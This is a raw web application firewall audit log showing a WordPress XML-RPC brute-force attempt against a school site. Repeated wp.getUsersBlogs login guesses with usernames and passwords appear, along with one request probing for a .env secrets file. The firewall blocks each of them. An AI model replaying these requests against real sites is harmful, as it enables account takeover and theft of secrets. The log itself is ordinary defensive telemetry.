"/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (130+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745514868329379 4872 (- - -) Stopwatch2: 1745514868329379 4872; combined=3709, p1=408, p2=3115, p3=0, p4=0, p5=108, sr=86, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b565ad57-Z-- --eccf0233-A-- [25/Apr/2025:00:15:08 +0700] aApxnMlQo524fhbIj1ySggAAABc 103.236.140.4 57616 103.236.140.4 8181 --eccf0233-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --eccf0233-C-- wp.getUsersBlogs administrator 1234%^&* --eccf0233-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eccf0233-E-- --eccf0233-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745514908395882 4931 (- - -) Stopwatch2: 1745514908395882 4931; combined=3679, p1=448, p2=3040, p3=0, p4=0, p5=115, sr=87, sw=76, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eccf0233-Z-- --ad320023-A-- [25/Apr/2025:00:15:28 +0700] aApxsPiVYlyO1xhz7yO9AQAAANc 103.236.140.4 58384 103.236.140.4 8181 --ad320023-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ad320023-C-- wp.getUsersBlogs administrator 1234560 --ad320023-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ad320023-E-- --ad320023-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (123+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745514928682845 4522 (- - -) Stopwatch2: 1745514928682845 4522; combined=3385, p1=368, p2=2873, p3=0, p4=0, p5=85, sr=72, sw=59, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad320023-Z-- --a0f80a22-A-- [25/Apr/2025:00:16:28 +0700] aApx7GLuk3f9kLjsdTaQZwAAAIo 103.236.140.4 60508 103.236.140.4 8181 --a0f80a22-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a0f80a22-C-- wp.getUsersBlogs administrator brandon --a0f80a22-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a0f80a22-E-- --a0f80a22-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (133+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745514988277956 5399 (- - -) Stopwatch2: 1745514988277956 5399; combined=4264, p1=517, p2=3562, p3=0, p4=0, p5=109, sr=109, sw=76, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a0f80a22-Z-- --c5eb2c2b-A-- [25/Apr/2025:00:17:28 +0700] aApyKMlQo524fhbIj1yU8gAAAA8 103.236.140.4 33976 103.236.140.4 8181 --c5eb2c2b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c5eb2c2b-C-- wp.getUsersBlogs administrator cowboys --c5eb2c2b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c5eb2c2b-E-- --c5eb2c2b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (113+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745515048541115 5326 (- - -) Stopwatch2: 1745515048541115 5326; combined=3779, p1=470, p2=3139, p3=0, p4=0, p5=100, sr=86, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c5eb2c2b-Z-- --ce80d17e-A-- [25/Apr/2025:00:18:28 +0700] aApyZN5yz20UX9VrdZPTVgAAAE0 103.236.140.4 35574 103.236.140.4 8181 --ce80d17e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ce80d17e-C-- wp.getUsersBlogs administrator shaggy --ce80d17e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce80d17e-E-- --ce80d17e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (123+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745515108223622 5316 (- - -) Stopwatch2: 1745515108223622 5316; combined=3801, p1=447, p2=3174, p3=0, p4=0, p5=106, sr=86, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce80d17e-Z-- --035b7770-A-- [25/Apr/2025:00:19:28 +0700] aApyoN5yz20UX9VrdZPTmgAAAEw 103.236.140.4 37224 103.236.140.4 8181 --035b7770-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --035b7770-C-- wp.getUsersBlogs kajur admin@#7890 --035b7770-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --035b7770-E-- --035b7770-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (130+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745515168359528 17283 (- - -) Stopwatch2: 1745515168359528 17283; combined=27609, p1=418, p2=2943, p3=0, p4=0, p5=12139, sr=88, sw=85, l=0, gc=12024 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --035b7770-Z-- --af057303-A-- [25/Apr/2025:00:20:28 +0700] aApy3MlQo524fhbIj1yWcwAAABc 103.236.140.4 39146 103.236.140.4 8181 --af057303-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --af057303-C-- wp.getUsersBlogs kajur PASSWORD --af057303-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --af057303-E-- --af057303-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (129+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745515228295860 4426 (- - -) Stopwatch2: 1745515228295860 4426; combined=3245, p1=421, p2=2682, p3=0, p4=0, p5=84, sr=83, sw=58, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --af057303-Z-- --a6aceb0d-A-- [25/Apr/2025:00:21:28 +0700] aApzGPiVYlyO1xhz7yO_vQAAAME 103.236.140.4 41002 103.236.140.4 8181 --a6aceb0d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a6aceb0d-C-- wp.getUsersBlogs kajur 789789 --a6aceb0d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6aceb0d-E-- --a6aceb0d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (127+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745515288052450 6057 (- - -) Stopwatch2: 1745515288052450 6057; combined=4295, p1=485, p2=3625, p3=0, p4=0, p5=108, sr=91, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6aceb0d-Z-- --dfff8862-A-- [25/Apr/2025:00:21:30 +0700] aApzGviVYlyO1xhz7yO_xQAAAMY 103.236.140.4 41088 103.236.140.4 8181 --dfff8862-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 206.81.12.187 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 206.81.12.187 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --dfff8862-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dfff8862-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745515290507408 827 (- - -) Stopwatch2: 1745515290507408 827; combined=309, p1=272, p2=0, p3=0, p4=0, p5=37, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dfff8862-Z-- --9f875364-A-- [25/Apr/2025:00:22:28 +0700] aApzVGLuk3f9kLjsdTaTTgAAAIU 103.236.140.4 42674 103.236.140.4 8181 --9f875364-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --9f875364-C-- wp.getUsersBlogs kajur caonima123 --9f875364-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9f875364-E-- --9f875364-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (116+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745515348232258 4768 (- - -) Stopwatch2: 1745515348232258 4768; combined=3257, p1=410, p2=2704, p3=0, p4=0, p5=84, sr=89, sw=59, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9f875364-Z-- --f0c5b87e-A-- [25/Apr/2025:00:23:15 +0700] aApzg_iVYlyO1xhz7yPA1QAAAMI 103.236.140.4 43776 103.236.140.4 8181 --f0c5b87e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f0c5b87e-C-- wp.getUsersBlogs kajur 1234%^&* --f0c5b87e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f0c5b87e-E-- --f0c5b87e-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745515395464117 5063 (- - -) Stopwatch2: 1745515395464117 5063; combined=3566, p1=469, p2=2927, p3=0, p4=0, p5=101, sr=85, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f0c5b87e-Z-- --cec1637f-A-- [25/Apr/2025:00:23:28 +0700] aApzkPiVYlyO1xhz7yPBDQAAAMI 103.236.140.4 44104 103.236.140.4 8181 --cec1637f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --cec1637f-C-- wp.getUsersBlogs kajur qwe1234 --cec1637f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cec1637f-E-- --cec1637f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (118+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745515408471033 5215 (- - -) Stopwatch2: 1745515408471033 5215; combined=3722, p1=460, p2=3095, p3=0, p4=0, p5=98, sr=87, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cec1637f-Z-- --53a97b71-A-- [25/Apr/2025:00:24:28 +0700] aApzzN5yz20UX9VrdZPWDQAAAEA 103.236.140.4 45750 103.236.140.4 8181 --53a97b71-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --53a97b71-C-- wp.getUsersBlogs kajur asdfgh --53a97b71-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --53a97b71-E-- --53a97b71-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (113+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745515468259495 5306 (- - -) Stopwatch2: 1745515468259495 5306; combined=3810, p1=446, p2=3169, p3=0, p4=0, p5=114, sr=90, sw=81, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --53a97b71-Z-- --8717b133-A-- [25/Apr/2025:00:25:28 +0700] aAp0CPiVYlyO1xhz7yPB6wAAAMY 103.236.140.4 47070 103.236.140.4 8181 --8717b133-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --8717b133-C-- wp.getUsersBlogs kajur ladybug --8717b133-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8717b133-E-- --8717b133-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (151+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745515528199006 4863 (- - -) Stopwatch2: 1745515528199006 4863; combined=3565, p1=476, p2=2915, p3=0, p4=0, p5=101, sr=156, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8717b133-Z-- --7c4e9370-A-- [25/Apr/2025:00:26:28 +0700] aAp0RN5yz20UX9VrdZPWsQAAAEs 103.236.140.4 48238 103.236.140.4 8181 --7c4e9370-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --7c4e9370-C-- wp.getUsersBlogs kesiswaan kesiswaan2018 --7c4e9370-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7c4e9370-E-- --7c4e9370-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (147+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745515588151143 5147 (- - -) Stopwatch2: 1745515588151143 5147; combined=3645, p1=489, p2=2998, p3=0, p4=0, p5=93, sr=90, sw=65, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7c4e9370-Z-- --088f767e-A-- [25/Apr/2025:00:27:28 +0700] aAp0gGLuk3f9kLjsdTaU_QAAAIE 103.236.140.4 50070 103.236.140.4 8181 --088f767e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --088f767e-C-- wp.getUsersBlogs kesiswaan kesiswaan@1991 --088f767e-F-- HTTP/1.1 403 